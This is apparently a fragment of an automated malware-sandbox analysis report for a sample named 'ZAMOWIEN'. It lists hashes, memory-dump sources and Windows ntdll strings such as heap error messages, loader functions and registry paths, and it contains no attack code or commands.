                                                                                  • Instruction ID: 88fa52feb1179afd531fec8c1f5307ccc9ae77b57c350304312113ca184f2a95
                                                                                  • Opcode Fuzzy Hash: 1bf6790120c162d35963a0a8172905ba4897cf987c061a7715631b287d75360a
                                                                                  • Instruction Fuzzy Hash: 5C5103B4A10B05EFEB05CF68CC647ADB7B5BF44365F10816EE5029B290DB74A911CBD2
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                  • API String ID: 0-3178619729
                                                                                  • Opcode ID: 0d00d89299881490e2ed265c69ac9a324a007ef419e0b2c5a278521c8ad07599
                                                                                  • Instruction ID: 6301b539b8765b6792c66c79c228a75b23cc4f6895aaab76f00cd004b5c65c5e
                                                                                  • Opcode Fuzzy Hash: 0d00d89299881490e2ed265c69ac9a324a007ef419e0b2c5a278521c8ad07599
                                                                                  • Instruction Fuzzy Hash: 192220B46013429FE706CF34C4A0B7ABBFAEF05754F148999E4458F682E735E981CBA1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                  • API String ID: 0-1168191160
                                                                                  • Opcode ID: 333f5c4561cad08a4f5a88e9af06c11a948637c906486be25009dd0f1a5d9881
                                                                                  • Instruction ID: c9027a88967847fec923a8449657455cf915178a33cf2e54e3936b1b25505f03
                                                                                  • Opcode Fuzzy Hash: 333f5c4561cad08a4f5a88e9af06c11a948637c906486be25009dd0f1a5d9881
                                                                                  • Instruction Fuzzy Hash: 5BF1D7B5A003288BDB20CF14CC98BE9B3B5EF49758F4444E9E909AB245E7349EC5CF59
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 376D1632
                                                                                  • HEAP: , xrefs: 376D14B6
                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 376D1648
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                  • API String ID: 0-3178619729
                                                                                  • Opcode ID: 9e721dd0015294fad0e56c825098c8095b170470c2698a8a6a575387ffbf72d9
                                                                                  • Instruction ID: 386a5315d4fcd82a0d5a4da47711c88f88b7cfd0acc68613286109b95114e0a6
                                                                                  • Opcode Fuzzy Hash: 9e721dd0015294fad0e56c825098c8095b170470c2698a8a6a575387ffbf72d9
                                                                                  • Instruction Fuzzy Hash: BEE13274A143459FEB18CF68C4A0BBABBF2EF48310F15885DE496CB242E778E945CB50
                                                                                  Strings
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 377400F1
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 377400C7
                                                                                  • RTL: Re-Waiting, xrefs: 37740128
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: db7be21677b29beb085fea29a2f529016f70bbdbc43cb1bff338b9ac4392ae13
                                                                                  • Instruction ID: 7d143aea0439f1cbdf6b0a44f2a85adf6a0e81d8c9bb801d40d265575f148ede
                                                                                  • Opcode Fuzzy Hash: db7be21677b29beb085fea29a2f529016f70bbdbc43cb1bff338b9ac4392ae13
                                                                                  • Instruction Fuzzy Hash: 53E10E74608741DFE310CF28C894B5AB7E5BF88364F100A5DF4A49B2E1DB7AE944CB82
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                  • API String ID: 0-2391371766
                                                                                  • Opcode ID: 4c942ee638b51fc724a7e489ae94561952253836b0df97b74aac2061291b9369
                                                                                  • Instruction ID: 7f991122959968719aaa3de8a09198337dd21b6e6a624fa87f9de24f3d712c9b
                                                                                  • Opcode Fuzzy Hash: 4c942ee638b51fc724a7e489ae94561952253836b0df97b74aac2061291b9369
                                                                                  • Instruction Fuzzy Hash: 1DB18CB2604342AFE711CF54C895B6BB7E9EB48768F41092DFA50DF260DB74E814CB92
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                                  • API String ID: 0-1146358195
                                                                                  • Opcode ID: 12c5fb61149dfb97ba8d13032c801d996e7342d32d512a27129a551b21ff3db8
                                                                                  • Instruction ID: 98895675b79fdfe14a6d8a009a22ff60eeff98ffed5192afa9ef56df8692fe0a
                                                                                  • Opcode Fuzzy Hash: 12c5fb61149dfb97ba8d13032c801d996e7342d32d512a27129a551b21ff3db8
                                                                                  • Instruction Fuzzy Hash: C1A17E716093819FD711CF24C894B6BBBE9EF88758F41092DF984AB250DB34ED04CB96
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                  • API String ID: 0-3870751728
                                                                                  • Opcode ID: b8477eebcbd64031417f3a141af1a8b959db6a0c530869dfaf7e51ded9cf2957
                                                                                  • Instruction ID: 52b64c8d6fd6956eee8604b64fbec9cdd1f2b84bdba1cc72f472b39c1db2f1fa
                                                                                  • Opcode Fuzzy Hash: b8477eebcbd64031417f3a141af1a8b959db6a0c530869dfaf7e51ded9cf2957
                                                                                  • Instruction Fuzzy Hash: 14912BB4E002059BEB14CFA9C884BEDBBB1FF88324F14856EE905AB351D7759842CF95
                                                                                  Strings
                                                                                  • TargetNtPath, xrefs: 377AB3AF
                                                                                  • GlobalizationUserSettings, xrefs: 377AB3B4
                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 377AB3AA
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                  • API String ID: 0-505981995
                                                                                  • Opcode ID: fd092bec38167a2888132312a7ead00091b522de8ad984f2b367d4d5f193d7d1
                                                                                  • Instruction ID: ee05865cc00822a5fd1ad98fc4818c0a30bbec8771213b7027ca1fa8679261bd
                                                                                  • Opcode Fuzzy Hash: fd092bec38167a2888132312a7ead00091b522de8ad984f2b367d4d5f193d7d1
                                                                                  • Instruction Fuzzy Hash: 48618472D51229ABEB61DF54DC9CB99B7B8EB04710F4102E9E508AB360C774EE84CF90
                                                                                  Strings
                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3772E455
                                                                                  • HEAP[%wZ]: , xrefs: 3772E435
                                                                                  • HEAP: , xrefs: 3772E442
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                  • API String ID: 0-1340214556
                                                                                  • Opcode ID: 9d7af6cac80432de23b987f76dd1957826dc2be67379d243781e32120c03dfc8
                                                                                  • Instruction ID: 5a65688294b34a5928f9ff2ced631a5823835a0c9fa21097c85a42841df6e3fc
                                                                                  • Opcode Fuzzy Hash: 9d7af6cac80432de23b987f76dd1957826dc2be67379d243781e32120c03dfc8
                                                                                  • Instruction Fuzzy Hash: 6C515636605785EFE301CBA4C9A8F9ABBFCFF08710F0444A4E5509B692D778E941DB61
                                                                                  Strings
                                                                                  • LdrpCompleteMapModule, xrefs: 3773A39D
                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3773A3A7
                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3773A396
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                  • API String ID: 0-1676968949
                                                                                  • Opcode ID: 1629777ba232c23d2aaddafdd67dd32953cd096d643551f6a8e20b4064331d41
                                                                                  • Instruction ID: 3533f053d419e5c15b608357217c653e7ef6d34b8de75e92ae37672fe3771bc3
                                                                                  • Opcode Fuzzy Hash: 1629777ba232c23d2aaddafdd67dd32953cd096d643551f6a8e20b4064331d41
                                                                                  • Instruction Fuzzy Hash: A15153B4A01745DBF715CB6CC9A5B1AB7E5EF047A0F0006A5F8529F6D2DB39E800CB82
                                                                                  Strings
                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3777D7B2
                                                                                  • HEAP[%wZ]: , xrefs: 3777D792
                                                                                  • HEAP: , xrefs: 3777D79F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                  • API String ID: 0-3815128232
                                                                                  • Opcode ID: 1ce6752144cb6078093fc8cb8f0a9468695b97143a164c2c32bedb16b6f22190
                                                                                  • Instruction ID: e6fc3922c372372b08fb35920c15c3d758ec107b08fbbeb1eac58a28edfc1884
                                                                                  • Opcode Fuzzy Hash: 1ce6752144cb6078093fc8cb8f0a9468695b97143a164c2c32bedb16b6f22190
                                                                                  • Instruction Fuzzy Hash: 665116791007D08EFB50CA29C85477277E2DF85398F508C8DE4C5EF685E62AE847DBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                  • API String ID: 0-1151232445
                                                                                  • Opcode ID: 710e2586eb64c489a8b36cd0fb136adb0150553b6f88be8d380c2fd2794af607
                                                                                  • Instruction ID: 4d126344580fc82257a7466c35ef761bd6e9c1b6f64605f7a94243c454cda7fc
                                                                                  • Opcode Fuzzy Hash: 710e2586eb64c489a8b36cd0fb136adb0150553b6f88be8d380c2fd2794af607
                                                                                  • Instruction Fuzzy Hash: CE4177B82003828FEB14CE39C0E4B7577E1DF01364F6548ADC8968F65ACA74E856DF22
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 37741954
                                                                                  • LdrpAllocateTls, xrefs: 3774194A
                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37741943
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                  • API String ID: 0-4274184382
                                                                                  • Opcode ID: 6783fa43e3190dc49244078eb2970438ffcd32ead9299d5c848377ecc02827c0
                                                                                  • Instruction ID: 4eb00f98218e1643d0704642a15ffed85d4f75ffe652e27ee62bd97c33639535
                                                                                  • Opcode Fuzzy Hash: 6783fa43e3190dc49244078eb2970438ffcd32ead9299d5c848377ecc02827c0
                                                                                  • Instruction Fuzzy Hash: 8C418BB5A00305AFDB15CFAACC91BADBBF5FF48314F008529E405AB601DB39A811CF51
                                                                                  Strings
                                                                                  • @, xrefs: 3775B2F0
                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3775B2B2
                                                                                  • GlobalFlag, xrefs: 3775B30F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                  • API String ID: 0-4192008846
                                                                                  • Opcode ID: ef102e4c38123c7ce0c6959fa054492152cc84a77896b4995580de8c80964bc9
                                                                                  • Instruction ID: 2fe1ab742fd4d1fface8b321d09e0b0937b3fb9553d212b327390422da9f326e
                                                                                  • Opcode Fuzzy Hash: ef102e4c38123c7ce0c6959fa054492152cc84a77896b4995580de8c80964bc9
                                                                                  • Instruction Fuzzy Hash: 5C316DB1E00209AFDB10DF95CC94BEEBBBDEF48754F440469E601BB160D7789A04CBA5
                                                                                  Strings
                                                                                  • LdrpInitializeTls, xrefs: 37741851
                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3774185B
                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3774184A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                  • API String ID: 0-931879808
                                                                                  • Opcode ID: 09b571fd7ac6c6c01806b026933ed74c0814c5b68eb11fc180eb4ed967a3dc37
                                                                                  • Instruction ID: 3f84f0396c25d93ad0b951e630c5f507c308167be18a1db5d99fed581594c80d
                                                                                  • Opcode Fuzzy Hash: 09b571fd7ac6c6c01806b026933ed74c0814c5b68eb11fc180eb4ed967a3dc37
                                                                                  • Instruction Fuzzy Hash: E831F871B50302BBEB20CB59CC85F5E77E9EF497A4F110429E402BF180EB74AD518BA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: RtlValidateHeap
                                                                                  • API String ID: 3446177414-1797218451
                                                                                  • Opcode ID: f3aff0f9c34edc6bfb41a7bfb75cf8a00fd6422861290045369a76aa3273a0ce
                                                                                  • Instruction ID: 751245a00bd109241fabd5fd078f1173e3a63a59e2735353411adbf02baeb5f9
                                                                                  • Opcode Fuzzy Hash: f3aff0f9c34edc6bfb41a7bfb75cf8a00fd6422861290045369a76aa3273a0ce
                                                                                  • Instruction Fuzzy Hash: 3E41077560438ADFDB02CFA4C4A07ADBB72FF85220F05865DD8216F390CB38A955EB95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@
                                                                                  • API String ID: 0-149943524
                                                                                  • Opcode ID: 38cf3a8306060d38eaa954f512ad0fb7a6b3aba426f0e66026a5871683bab56e
                                                                                  • Instruction ID: e1ed6371d24332138e1c1c2e13e8119c471a45cfbb872d4d49570e805087b4ab
                                                                                  • Opcode Fuzzy Hash: 38cf3a8306060d38eaa954f512ad0fb7a6b3aba426f0e66026a5871683bab56e
                                                                                  • Instruction Fuzzy Hash: 6632D1B41063118BD720CF14CAB073EB7EAEF88750F50491EF9959BA51E734E944CBA2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: f3be753ad88bbbb8e10c6523adc89e531f61bb1fa1e52079cb734f8f4b44a36c
                                                                                  • Instruction ID: 539ea3fd26c14d9f25ae61fa3cca19d7a1b79130662e73bb60bf224dd5fb19b0
                                                                                  • Opcode Fuzzy Hash: f3be753ad88bbbb8e10c6523adc89e531f61bb1fa1e52079cb734f8f4b44a36c
                                                                                  • Instruction Fuzzy Hash: 9831D030312B06EFE7419F64CA60B9AFB66BF88754F001155E9009BE61DB74E821CFC6
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 0b195b48bc7d0b603687f6e15d647e47c9c81e9a7ee156bc195a75d9730dcd9a
                                                                                  • Instruction ID: e9f0901174a4ef36659e71b463f58ffe911f2a7413716707352cdfe628bb60f5
                                                                                  • Opcode Fuzzy Hash: 0b195b48bc7d0b603687f6e15d647e47c9c81e9a7ee156bc195a75d9730dcd9a
                                                                                  • Instruction Fuzzy Hash: C511A7B1B14215EFEB058B68C989A5EB7B9EF48374F11016DE405EB340DB749D11CF94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                  • Instruction ID: e7b16cc2b2cb2ce9ace7715ec33adf220cd6dd459af05f6588c1bfe8a3d1d2c4
                                                                                  • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                  • Instruction Fuzzy Hash: 03C1DF7120A3429BE714CF24D881B9BBBE6AFC5368F054E3CF5959E290E779E504CB42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$AddD
                                                                                  • API String ID: 0-2525844869
                                                                                  • Opcode ID: df79a183f31fa62e4cc2f576eef033f9a6c6d2fac641e4b038790a282bbb7afb
                                                                                  • Instruction ID: d2eae779ebe9eea8fb5ce9961a997caadeea7554855ad7fae8e7f5f399c32a7c
                                                                                  • Opcode Fuzzy Hash: df79a183f31fa62e4cc2f576eef033f9a6c6d2fac641e4b038790a282bbb7afb
                                                                                  • Instruction Fuzzy Hash: 9FA17DB6604340AFE315CF14C845FABB7EAFF84765F504A2EF9948A150E770E905CB62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 56a5c2c9a1ddeb1fb748a3ec50d08a71d7ee37cdebc7086b0046eb099e968584
                                                                                  • Instruction ID: 31d052da21b83358fac97b1949a80a715511840703a4fc50b8b172fd37149b15
                                                                                  • Opcode Fuzzy Hash: 56a5c2c9a1ddeb1fb748a3ec50d08a71d7ee37cdebc7086b0046eb099e968584
                                                                                  • Instruction Fuzzy Hash: 865136B5E0025DAEDF11CFA4CC90AEFBBB9AF08794F10456AE511BB290D735AD05CB60
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 377AB5C4
                                                                                  • RedirectedKey, xrefs: 377AB60E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                  • API String ID: 0-1388552009
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$$
                                                                                  • API String ID: 3446177414-233714265
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                  • API String ID: 0-118005554
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local\$@
                                                                                  • API String ID: 0-380025441
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3774289F
                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3774289A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                  • API String ID: 0-2653619699
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @[|7@[|7
                                                                                  • API String ID: 0-3259368316
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
